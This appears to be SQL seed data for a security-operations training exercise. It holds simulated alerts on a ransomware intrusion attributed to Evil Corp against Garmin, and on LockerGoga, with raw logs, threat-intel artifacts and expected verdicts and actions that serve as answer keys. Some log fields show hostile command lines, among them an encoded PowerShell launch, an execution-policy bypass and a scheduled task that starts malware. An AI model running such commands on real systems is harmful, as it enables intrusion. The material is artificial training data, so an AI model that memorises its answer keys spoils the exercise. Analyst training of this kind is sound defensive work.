(965, 'Initial Access via Phishing Campaign', 'high', 'Email Security Gateway Logs', 'Evil Corp initiated their attack with a targeted phishing campaign, leveraging social engineering to trick Garmin employees into opening malicious attachments. This step marks the beginning of the attack, setting the stage for further compromise.', 'Social Engineering', 'T1566', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:05Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.5.25\",\"email_subject\":\"Urgent: Action Required\",\"email_sender\":\"noreply@garmin-support.com\",\"recipient\":\"john.doe@garmin.com\",\"attachment_name\":\"Invoice_4823.docm\",\"attachment_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"action\":\"Attachment Opened\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"malicious_indicator\":true}', '2026-01-17 03:38:37', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.5.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of victim\'s workstation.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"noreply@garmin-support.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"suspicious\",\"details\":\"Sender email used in spoofed phishing attempts.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malicious document files.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Initial Access via Phishing Campaign\",\"date\":\"2026-02-01T20:32:22.652Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(966, 'WastedLocker Payload Execution', 'critical', 'Endpoint Detection and Response (EDR) Systems', 'Following a successful phishing attack, the WastedLocker ransomware was deployed on Garmin\'s network. This execution phase is critical as it disrupts operations, causing widespread service outages.', 'Malware Deployment', 'T1059.001: Command and Scripting Interpreter: PowerShell', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-01T14:23:45Z\",\"event_type\":\"malware_execution\",\"host_ip\":\"10.0.25.13\",\"attacker_ip\":\"185.243.115.12\",\"username\":\"jdoe\",\"filename\":\"wastedlocker.exe\",\"file_hash\":\"3fa7b6810b1c8cb4f2b4d5a9e7e6c8f9\",\"command_line\":\"C:\\\\Users\\\\jdoe\\\\Downloads\\\\wastedlocker.exe\",\"process_id\":4567,\"parent_process_id\":1234,\"alert_id\":\"edr-2023-1001-002\",\"detection_method\":\"behavioral_analysis\"}', '2026-01-17 03:38:37', '2026-02-16 17:53:26', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.25.13\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network_scan\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"185.243.115.12\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence_feed\",\"verdict\":\"malicious\",\"details\":\"Known command and control server associated with WastedLocker\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"wastedlocker.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"Executable associated with WastedLocker ransomware\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"3fa7b6810b1c8cb4f2b4d5a9e7e6c8f9\",\"is_critical\":true,\"osint_result\":{\"source\":\"hash_lookup_service\",\"verdict\":\"malicious\",\"details\":\"Hash matches known WastedLocker ransomware variant\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_user_directory\",\"verdict\":\"internal\",\"details\":\"Compromised user\'s account\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(967, 'Persistence through Scheduled Tasks', 'high', 'System Logs and Scheduled Tasks', 'Evil Corp utilized scheduled tasks to maintain persistence within Garmin\'s network. This mechanism enabled them to re-establish connections for ongoing malicious activities without detection.', 'Persistence Mechanism', 'T1053', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:00Z\",\"event_id\":\"4698\",\"task_name\":\"\\\\Microsoft\\\\Windows\\\\UpdateTasks\\\\CriticalUpdate\",\"author\":\"SYSTEM\",\"trigger\":\"Daily\",\"action\":\"C:\\\\Windows\\\\System32\\\\cmd.exe /c start C:\\\\malware\\\\evil_task.exe\",\"target_ip\":\"192.168.45.8\",\"attacker_ip\":\"45.76.123.55\",\"malware_hash\":\"8f14e45fceea167a5a36dedd4bea2543\",\"username\":\"admin_garmin\",\"status\":\"Scheduled\"}', '2026-01-17 03:38:37', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.45.8\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the target machine.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"45.76.123.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with Evil Corp operations.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"8f14e45fceea167a5a36dedd4bea2543\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"Hash of the malware used in the persistence mechanism.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"evil_task.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"endpoint_security\",\"verdict\":\"malicious\",\"details\":\"Malicious executable used in scheduled task.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"admin_garmin\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_directory\",\"verdict\":\"clean\",\"details\":\"Username associated with the scheduled task creation.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.654Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_id\\\":\\\"4698\\\",\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\UpdateTasks\\\\\\\\CriticalUpdate\\\",\\\"author\\\":\\\"SYSTEM\\\",\\\"trigger\\\":\\\"Daily\\\",\\\"action\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe /c start C:\\\\\\\\malware\\\\\\\\evil_task.exe\\\",\\\"target_ip\\\":\\\"192.168.45.8\\\",\\\"attacker_ip\\\":\\\"45.76.123.55\\\",\\\"malware_hash\\\":\\\"8f14e45fceea167a5a36dedd4bea2543\\\",\\\"username\\\":\\\"admin_garmin\\\",\\\"status\\\":\\\"Scheduled\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.654Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_id\\\":\\\"4698\\\",\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\UpdateTasks\\\\\\\\CriticalUpdate\\\",\\\"author\\\":\\\"SYSTEM\\\",\\\"trigger\\\":\\\"Daily\\\",\\\"action\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe /c start C:\\\\\\\\malware\\\\\\\\evil_task.exe\\\",\\\"target_ip\\\":\\\"192.168.45.8\\\",\\\"attacker_ip\\\":\\\"45.76.123.55\\\",\\\"malware_hash\\\":\\\"8f14e45fceea167a5a36dedd4bea2543\\\",\\\"username\\\":\\\"admin_garmin\\\",\\\"status\\\":\\\"Scheduled\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.654Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_id\\\":\\\"4698\\\",\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\UpdateTasks\\\\\\\\CriticalUpdate\\\",\\\"author\\\":\\\"SYSTEM\\\",\\\"trigger\\\":\\\"Daily\\\",\\\"action\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe /c start C:\\\\\\\\malware\\\\\\\\evil_task.exe\\\",\\\"target_ip\\\":\\\"192.168.45.8\\\",\\\"attacker_ip\\\":\\\"45.76.123.55\\\",\\\"malware_hash\\\":\\\"8f14e45fceea167a5a36dedd4bea2543\\\",\\\"username\\\":\\\"admin_garmin\\\",\\\"status\\\":\\\"Scheduled\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.654Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_id\\\":\\\"4698\\\",\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\UpdateTasks\\\\\\\\CriticalUpdate\\\",\\\"author\\\":\\\"SYSTEM\\\",\\\"trigger\\\":\\\"Daily\\\",\\\"action\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe /c start C:\\\\\\\\malware\\\\\\\\evil_task.exe\\\",\\\"target_ip\\\":\\\"192.168.45.8\\\",\\\"attacker_ip\\\":\\\"45.76.123.55\\\",\\\"malware_hash\\\":\\\"8f14e45fceea167a5a36dedd4bea2543\\\",\\\"username\\\":\\\"admin_garmin\\\",\\\"status\\\":\\\"Scheduled\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.654Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_id\\\":\\\"4698\\\",\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\UpdateTasks\\\\\\\\CriticalUpdate\\\",\\\"author\\\":\\\"SYSTEM\\\",\\\"trigger\\\":\\\"Daily\\\",\\\"action\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe /c start C:\\\\\\\\malware\\\\\\\\evil_task.exe\\\",\\\"target_ip\\\":\\\"192.168.45.8\\\",\\\"attacker_ip\\\":\\\"45.76.123.55\\\",\\\"malware_hash\\\":\\\"8f14e45fceea167a5a36dedd4bea2543\\\",\\\"username\\\":\\\"admin_garmin\\\",\\\"status\\\":\\\"Scheduled\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(968, 'Lateral Movement via RDP Detected', 'high', 'Remote Desktop Protocol (RDP) Logs', 'The attackers have utilized RDP to conduct lateral movement within Garmin\'s network, compromising additional systems to maximize the ransomware\'s impact.', 'Movement within Network', 'T1021.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-14T03:22:45Z\",\"event_id\":\"4624\",\"event_type\":\"logon_success\",\"source_ip\":\"203.0.113.15\",\"destination_ip\":\"10.0.5.23\",\"username\":\"jdoe_admin\",\"logon_type\":\"10\",\"logon_process\":\"User32\",\"authentication_package\":\"Negotiate\",\"status\":\"Success\",\"session_id\":\"0x3e7\",\"host\":\"GARMIN-SERVER1\",\"malware_hash\":\"58a9e13c1a2d4c4b8fbfd6a7d60bbabc\",\"filename\":\"rdp_movement_tool.exe\"}', '2026-01-17 03:38:37', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with ransomware distribution.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.5.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised server.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe_admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"suspicious\",\"details\":\"Privileged account used in unauthorized access.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"58a9e13c1a2d4c4b8fbfd6a7d60bbabc\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known lateral movement tools.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"rdp_movement_tool.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Detection\",\"verdict\":\"malicious\",\"details\":\"Filename of tool used for lateral movement via RDP.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.656Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T03:22:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"event_type\\\":\\\"logon_success\\\",\\\"source_ip\\\":\\\"203.0.113.15\\\",\\\"destination_ip\\\":\\\"10.0.5.23\\\",\\\"username\\\":\\\"jdoe_admin\\\",\\\"logon_type\\\":\\\"10\\\",\\\"logon_process\\\":\\\"User32\\\",\\\"authentication_package\\\":\\\"Negotiate\\\",\\\"status\\\":\\\"Success\\\",\\\"session_id\\\":\\\"0x3e7\\\",\\\"host\\\":\\\"GARMIN-SERVER1\\\",\\\"malware_hash\\\":\\\"58a9e13c1a2d4c4b8fbfd6a7d60bbabc\\\",\\\"filename\\\":\\\"rdp_movement_tool.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.656Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T03:22:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"event_type\\\":\\\"logon_success\\\",\\\"source_ip\\\":\\\"203.0.113.15\\\",\\\"destination_ip\\\":\\\"10.0.5.23\\\",\\\"username\\\":\\\"jdoe_admin\\\",\\\"logon_type\\\":\\\"10\\\",\\\"logon_process\\\":\\\"User32\\\",\\\"authentication_package\\\":\\\"Negotiate\\\",\\\"status\\\":\\\"Success\\\",\\\"session_id\\\":\\\"0x3e7\\\",\\\"host\\\":\\\"GARMIN-SERVER1\\\",\\\"malware_hash\\\":\\\"58a9e13c1a2d4c4b8fbfd6a7d60bbabc\\\",\\\"filename\\\":\\\"rdp_movement_tool.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.656Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T03:22:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"event_type\\\":\\\"logon_success\\\",\\\"source_ip\\\":\\\"203.0.113.15\\\",\\\"destination_ip\\\":\\\"10.0.5.23\\\",\\\"username\\\":\\\"jdoe_admin\\\",\\\"logon_type\\\":\\\"10\\\",\\\"logon_process\\\":\\\"User32\\\",\\\"authentication_package\\\":\\\"Negotiate\\\",\\\"status\\\":\\\"Success\\\",\\\"session_id\\\":\\\"0x3e7\\\",\\\"host\\\":\\\"GARMIN-SERVER1\\\",\\\"malware_hash\\\":\\\"58a9e13c1a2d4c4b8fbfd6a7d60bbabc\\\",\\\"filename\\\":\\\"rdp_movement_tool.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.656Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T03:22:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"event_type\\\":\\\"logon_success\\\",\\\"source_ip\\\":\\\"203.0.113.15\\\",\\\"destination_ip\\\":\\\"10.0.5.23\\\",\\\"username\\\":\\\"jdoe_admin\\\",\\\"logon_type\\\":\\\"10\\\",\\\"logon_process\\\":\\\"User32\\\",\\\"authentication_package\\\":\\\"Negotiate\\\",\\\"status\\\":\\\"Success\\\",\\\"session_id\\\":\\\"0x3e7\\\",\\\"host\\\":\\\"GARMIN-SERVER1\\\",\\\"malware_hash\\\":\\\"58a9e13c1a2d4c4b8fbfd6a7d60bbabc\\\",\\\"filename\\\":\\\"rdp_movement_tool.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.656Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T03:22:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"event_type\\\":\\\"logon_success\\\",\\\"source_ip\\\":\\\"203.0.113.15\\\",\\\"destination_ip\\\":\\\"10.0.5.23\\\",\\\"username\\\":\\\"jdoe_admin\\\",\\\"logon_type\\\":\\\"10\\\",\\\"logon_process\\\":\\\"User32\\\",\\\"authentication_package\\\":\\\"Negotiate\\\",\\\"status\\\":\\\"Success\\\",\\\"session_id\\\":\\\"0x3e7\\\",\\\"host\\\":\\\"GARMIN-SERVER1\\\",\\\"malware_hash\\\":\\\"58a9e13c1a2d4c4b8fbfd6a7d60bbabc\\\",\\\"filename\\\":\\\"rdp_movement_tool.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(969, 'Data Exfiltration and Encryption - Final Stage', 'critical', 'Network Traffic Analysis', 'Evil Corp successfully exfiltrated sensitive data and encrypted critical systems, demanding a $10 million ransom. This action has caused significant service disruption and poses risks regarding data privacy and potential sanctions evasion.', 'Data Breach', 'T1020 - Automated Exfiltration', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-01T14:52:30Z\",\"source_ip\":\"10.0.0.15\",\"destination_ip\":\"185.199.108.153\",\"action\":\"exfiltration\",\"protocol\":\"HTTPS\",\"file_exfiltrated\":\"sensitive_data.zip\",\"hash\":\"3b1c83d776f1a7e6b9e5f6c7d1234abc\",\"user\":\"jdoe\",\"ransom_note\":\"RansomNote.txt\",\"ransom_amount\":\"$10 million\",\"encryption_status\":\"Complete\",\"event_id\":\"evt-2023-10-01-0005\"}', '2026-01-17 03:38:37', '2026-02-16 17:53:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"185.199.108.153\",\"is_critical\":true,\"osint_result\":{\"source\":\"osint_db\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malicious activities\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3b1c83d776f1a7e6b9e5f6c7d1234abc\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with ransomware\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"sensitive_data.zip\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Unusual file exfiltrated\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"User account involved in unusual activity\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(970, 'Suspicious Network Activity Detected', 'high', 'Network Intrusion Detection System (NIDS)', 'An alarming spike in network traffic has been detected, indicating potential intrusion attempts by LockerGoga exploiting known vulnerabilities in remote access services. The initial access phase involves suspicious connections from an external IP attempting to exploit a vulnerable service.', 'Initial Access', 'T1190 - Exploit Public-Facing Application', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:23:45Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"protocol\":\"TCP\",\"destination_port\":3389,\"event_type\":\"Exploit Attempt\",\"payload\":{\"attack_vector\":\"RDP Exploit\",\"malware_name\":\"LockerGoga\",\"malware_hash\":\"2c1743a391305fbf367df8e4f069f9f9\",\"username\":\"admin\"},\"alert_metadata\":{\"nids_id\":\"NIDS-2023-1001\",\"severity\":\"High\"}}', '2026-01-17 03:39:18', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known LockerGoga attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Corporate network server.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"2c1743a391305fbf367df8e4f069f9f9\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash known to be associated with LockerGoga ransomware.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Policy\",\"verdict\":\"internal\",\"details\":\"Common administrator account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'advanced', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(971, 'Malware Execution Observed', 'critical', 'Endpoint Detection and Response (EDR)', 'Following initial access, the attacker deploys the LockerGoga ransomware, which begins encrypting files on the infected systems, indicating the execution phase of the attack.', 'Execution', 'T1059.001 - Command and Scripting Interpreter: PowerShell', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T08:45:23Z\",\"event_id\":\"4624\",\"user\":\"compromised_user\",\"src_ip\":\"203.0.113.45\",\"dest_ip\":\"10.0.0.25\",\"process_name\":\"powershell.exe\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\Users\\\\compromised_user\\\\AppData\\\\Roaming\\\\LockerGoga\\\\encrypt.ps1\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"file_path\":\"C:\\\\Users\\\\compromised_user\\\\AppData\\\\Roaming\\\\LockerGoga\\\\encrypt.ps1\",\"action\":\"File encryption started\"}', '2026-01-17 03:39:18', '2026-02-16 17:52:42', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with ransomware distribution\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised system\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"MalwareBazaar\",\"verdict\":\"malicious\",\"details\":\"Hash associated with LockerGoga ransomware payload\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"encrypt.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"malicious\",\"details\":\"Ransomware script executed on the host\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc 